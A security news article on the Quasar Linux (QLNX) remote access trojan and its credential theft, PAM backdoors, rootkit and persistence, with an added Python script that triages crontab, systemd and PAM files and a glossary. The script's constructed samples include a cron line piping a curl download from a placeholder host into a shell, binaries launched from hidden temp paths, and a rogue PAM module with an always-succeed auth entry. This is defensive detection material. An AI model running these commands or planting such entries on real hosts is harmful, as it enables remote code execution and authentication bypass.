Shadow Code: How the Quasar Linux RAT Infiltrates Developer Pipelines
Subtitle: A stealthy new malware targets the heart of the software supply chain, putting developer credentials (and the wider ecosystem) at risk.
It starts with a silent breach: lines of code slipping unnoticed into a developer’s machine. But this isn’t just another malware scare: the newly discovered Quasar Linux (QLNX) Remote Access Trojan (RAT) is engineered to burrow deep, steal the digital keys to the kingdom, and potentially poison the very software millions rely on.
According to Trend Micro researchers, QLNX is not your average backdoor. Its primary mission: steal the credentials, keys, and tokens that grant access to critical development tools, cloud infrastructures, and code repositories. With these, attackers don’t just compromise a single machine; they can hijack an entire software supply chain.
The implications are chilling. By infiltrating a developer’s workflow, QLNX gives adversaries the power to silently insert malicious code into legitimate software packages, potentially reaching thousands, or even millions, of unsuspecting users downstream. The malware specifically hunts for sensitive credentials tied to platforms like AWS, Kubernetes, Docker Hub, Git, NPM, and PyPI. If compromised, these accounts can be weaponized to push malicious updates or pivot into production cloud environments.
QLNX’s technical sophistication is formidable. It operates entirely in memory, erasing its tracks by spoofing process names and deleting itself when needed. System reconnaissance routines identify containerized environments, while a two-tier rootkit system, combining userspace hooks and kernel-level eBPF map controllers, hides processes, files, and network ports from prying eyes. The malware even clears system logs to further cover its tracks.
Credential theft is enabled through two distinct Pluggable Authentication Module (PAM) backdoors, capable of capturing plaintext passwords, SSH sessions, and authentication tokens. The malware’s arsenal includes 58 command options, ranging from file manipulation and screen capture to remote shell access and keystroke logging, enough to grant attackers near-total control over compromised machines.
Persistence is another hallmark. QLNX can embed itself using up to six different mechanisms, such as crontab entries, init scripts, and service files, ensuring it survives reboots and system cleanups. Its modular design allows attackers to deploy multiple persistence methods simultaneously, making eradication a formidable challenge.
As supply chain attacks escalate, QLNX is a stark reminder: the tools that build our digital world are increasingly targeted. With its blend of stealth, persistence, and credential theft, QLNX marks an evolution in how cybercriminals aim to compromise not just individuals, but the very backbone of software infrastructure. For developers and organizations alike, vigilance is no longer optional; it’s essential.
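The two preceding paragraphs describe the artefacts a defender would look for after a suspected QLNX infection: PAM modules that do not belong on the host, and persistence entries in cron and service files. The script below is an added example written for this article; it is not code from Trend Micro's report or from the malware itself. It triages constructed samples of a crontab, a systemd unit and a PAM stack, flagging entries that run from world-writable or hidden paths, pipe downloads into a shell, load PAM modules from non-standard directories or outside an analyst-supplied baseline, or short-circuit the auth stack with `pam_permit.so`. The module names `pam_hook.so`, the baseline set and the list of standard PAM directories are assumptions for the demonstration; on a real host you would feed it `/etc/crontab`, `/var/spool/cron/*`, `/etc/systemd/system/*.service` and `/etc/pam.d/*`.

```python
"""Persistence and PAM triage helpers (added example; inputs are constructed)."""
import re

# Launch locations that legitimate scheduled jobs and services rarely use.
SUSPICIOUS_PATHS = ("/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_DIR = re.compile(r"/\.[A-Za-z0-9_-]+/")          # e.g. /home/dev/.cache/x
SUSPICIOUS_PATTERNS = [
    re.compile(r"base64\s+(-d|--decode)"),               # inline decoded payloads
    re.compile(r"(curl|wget)[^|]*\|\s*(ba)?sh"),         # download piped to a shell
    re.compile(r"\bnohup\b.*&\s*$"),                     # detached background job
]
# Assumed set of directories distributions install PAM modules into.
STANDARD_PAM_DIRS = {
    "/lib/security", "/lib64/security", "/usr/lib/security",
    "/usr/lib64/security", "/lib/x86_64-linux-gnu/security",
}


def suspicious_reasons(cmd):
    """Return the indicators found in a single command line (empty if clean)."""
    reasons = [f"executes from {p}" for p in SUSPICIOUS_PATHS if p in cmd]
    if HIDDEN_DIR.search(cmd):
        reasons.append("executes from a hidden directory")
    reasons += [f"matches /{pat.pattern}/" for pat in SUSPICIOUS_PATTERNS if pat.search(cmd)]
    return reasons


def cron_findings(cron_text):
    """(line number, reasons) for every crontab entry that carries an indicator."""
    findings = []
    for lineno, raw in enumerate(cron_text.splitlines(), 1):
        line = raw.strip()
        # Skip blanks, comments and variable assignments such as SHELL=/bin/sh.
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        reasons = suspicious_reasons(line)
        if reasons:
            findings.append((lineno, reasons))
    return findings


def systemd_findings(unit_text):
    """Inspect the Exec* directives of a unit file, which are what actually runs."""
    findings = []
    for lineno, raw in enumerate(unit_text.splitlines(), 1):
        line = raw.strip()
        if line.startswith(("ExecStart", "ExecStartPre", "ExecStartPost")) and "=" in line:
            reasons = suspicious_reasons(line.split("=", 1)[1])
            if reasons:
                findings.append((lineno, reasons))
    return findings


def pam_findings(pam_text, allowed_modules):
    """Flag PAM stack lines whose module is not in the baseline, lives outside the
    standard module directories, or makes 'auth' succeed unconditionally."""
    findings = []
    for lineno, raw in enumerate(pam_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("@include"):
            continue
        tokens = line.split()
        if len(tokens) < 3:
            continue
        mtype = tokens[0].lstrip("-")                    # '-auth' means optional entry
        if tokens[1].startswith("["):                    # bracketed control: [success=1 default=ignore]
            end = next((i for i, t in enumerate(tokens) if t.endswith("]")), None)
            if end is None or end + 1 >= len(tokens):
                continue
            control, module = " ".join(tokens[1:end + 1]), tokens[end + 1]
        else:
            control, module = tokens[1], tokens[2]
        reasons = []
        if "/" in module:
            directory, name = module.rsplit("/", 1)
            if directory not in STANDARD_PAM_DIRS:
                reasons.append(f"module loaded from non-standard directory {directory}")
        else:
            name = module
        if name not in allowed_modules:
            reasons.append(f"module {name} absent from baseline")
        if mtype == "auth" and name == "pam_permit.so" and control == "sufficient":
            reasons.append("auth stack short-circuits to success (any password accepted)")
        if reasons:
            findings.append((lineno, reasons))
    return findings


# Constructed samples; pam_hook.so and example.invalid are placeholders, not real indicators.
CRON_SAMPLE = (
    "# m h dom mon dow user command\n"
    "SHELL=/bin/sh\n"
    "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
    "*/5 * * * * dev /dev/shm/.x/update >/dev/null 2>&1\n"
    "@reboot dev curl -s http://example.invalid/s | sh\n"
)
SYSTEMD_SAMPLE = (
    "[Unit]\nDescription=System update helper\n\n[Service]\nType=simple\n"
    "ExecStart=/tmp/.cache/systemd-helper --daemon\nRestart=always\n\n"
    "[Install]\nWantedBy=multi-user.target\n"
)
PAM_SAMPLE = (
    "auth required pam_env.so\n"
    "auth sufficient pam_permit.so\n"
    "auth required /usr/local/lib/pam_hook.so\n"
    "account required pam_unix.so\n"
    "password required pam_unix.so\n"
    "session required pam_unix.so\n"
)
ALLOWED_PAM_MODULES = {"pam_env.so", "pam_unix.so", "pam_permit.so", "pam_deny.so"}

if __name__ == "__main__":
    for label, found in (("cron", cron_findings(CRON_SAMPLE)),
                         ("systemd", systemd_findings(SYSTEMD_SAMPLE)),
                         ("pam", pam_findings(PAM_SAMPLE, ALLOWED_PAM_MODULES))):
        for lineno, reasons in found:
            print(f"{label} line {lineno}: {'; '.join(reasons)}")
```

The baseline set matters more than the pattern list: a PAM backdoor of the kind described above is a perfectly ordinary shared object from the loader's point of view, so comparing `/etc/pam.d` and the module directory against a known-good host (or the package manager's file list) is what actually surfaces it. The cron and systemd checks are heuristics and will need tuning to the jobs a given build host legitimately runs.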
WIKICROOK
- Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
- Rootkit: A rootkit is stealthy malware that hides itself on a device, allowing attackers to secretly control the system and evade detection.
- Pluggable Authentication Module (PAM): PAM is a Linux framework that lets administrators integrate various authentication methods, like passwords or biometrics, into system services without changing application code.
- eBPF: eBPF is a Linux kernel technology for running secure, sandboxed programs, enabling advanced monitoring, tracing, and security features without kernel changes.
- Persistence Mechanism: A persistence mechanism is a method used by malware to stay active on a system, surviving reboots and removal attempts by users or security tools.